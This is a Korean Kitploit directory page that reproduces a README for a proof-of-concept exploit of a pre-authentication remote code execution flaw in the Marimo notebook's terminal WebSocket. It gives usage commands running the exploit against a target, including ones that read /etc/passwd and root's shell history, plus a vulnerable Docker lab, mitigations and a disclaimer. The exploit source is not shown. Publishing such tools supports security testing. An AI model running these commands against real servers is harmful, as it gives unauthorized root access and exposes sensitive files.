Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-39987-marimo-rce — CVE-2026-39987 | Kitploit
도구/GitHubGitHub/0xdeadroot/cve-2026-39987-marimo-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRemote Access Tool
GitHub0xdeadroot/cve-2026-39987-marimo-rce

CVE-2026-39987-marimo-rce

CVE-2026-39987

저장소 보기
13개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-39987 - Marimo Pre-Auth RCE

Unauthenticated Remote Code Execution in Marimo via WebSocket Terminal

Critical Python Docker


📌 개요

CVE-2026-39987은 Marimo 0.23.0 이전 버전에 영향을 미치는 치명적인 사전 인증 원격 코드 실행 취약점입니다. /terminal/ws WebSocket 엔드포인트는 인증을 완전히 우회하여, 인증되지 않은 모든 공격자가 Marimo 프로세스(일반적으로 Docker 환경에서는 root)의 권한으로 완전한 대화형 PTY 셸을 얻을 수 있도록 합니다.


🛠️ 취약점 세부 정보

  • CVE ID: CVE-2026-39987
  • 영향 받는 제품: Marimo (반응형 Python 노트북)
  • 영향 받는 버전: marimo < 0.23.0
  • 수정된 버전: marimo >= 0.23.0
  • 공격 벡터: 네트워크 (인증되지 않음)
  • 영향 받는 엔드포인트: /terminal/ws
도구 다운로드
  • 영향: root 권한의 완전한 원격 셸 (PTY)

  • ✨ PoC 기능

    • 자동 http:// → ws:// 및 https:// → wss:// 변환
    • 지능형 PTY 버퍼 드레이닝
    • 안정적인 명령 실행
    • 깔끔하고 최소화된 안정적인 코드
    • Docker 랩 테스트 준비 완료

    📁 저장소 구조

    root@kitploit:~
    CVE-2026-39987/
    ├── CVE-2026-39987-poc.py          ← Main Exploit
    ├── docker-vulnerable/
    │   ├── Dockerfile
    │   └── docker-compose.yml
    ├── notebooks/                     ← Persistent notebooks (optional)
    ├── README.md
    └── LICENSE
    

    🚀 사용법

    1. 종속성 설치

    root@kitploit:~
    pip install websocket-client
    

    2. 익스플로잇 실행

    root@kitploit:~
    # 기본 사용법
    python3 CVE-2026-39987-poc.py http://localhost:2718 "id && whoami && hostname"
    
    # 시스템 열거
    python3 CVE-2026-39987-poc.py http://localhost:2718 "id && whoami && cat /etc/os-release && ls -la /app"
    
    # 민감한 파일 읽기
    python3 CVE-2026-39987-poc.py http://target:2718 "cat /etc/passwd && cat /root/.bash_history"
    

    🧪 취약한 Docker 랩

    root@kitploit:~
    cd docker-vulnerable
    docker compose up --build -d
    

    그런 다음 테스트:

    root@kitploit:~
    python3 CVE-2026-39987-poc.py http://localhost:2718 "id && whoami"
    

    🛡️ 완화 조치

    • 즉시 marimo >= 0.23.0으로 업그레이드
    • Marimo를 인터넷에 직접 노출하지 마십시오
    • 인증이 있는 리버스 프록시 뒤에 배치
    • 가능하면 루트가 아닌 사용자로 실행
    • 방화벽 또는 프록시 규칙을 통해 /terminal/ws에 대한 접근 제한

    ⚠️ 면책 조항

    이 개념 증명은 교육 목적 및 승인된 보안 테스트 전용으로 제작되었습니다. 저자는 이 도구로 인한 오용이나 손해에 대해 책임을 지지 않습니다. 시스템을 테스트하기 전에 명시적 허가를 받았는지 확인하십시오.

    윤리적이고 책임감 있게 사용하십시오.


    📄 참고 자료

    • 공식 CVE 권고
    • Marimo GitHub 저장소
    • NVD 항목 (CVE-2026-39987)

    보안 연구 및 책임 있는 공개를 위해 제작되었습니다.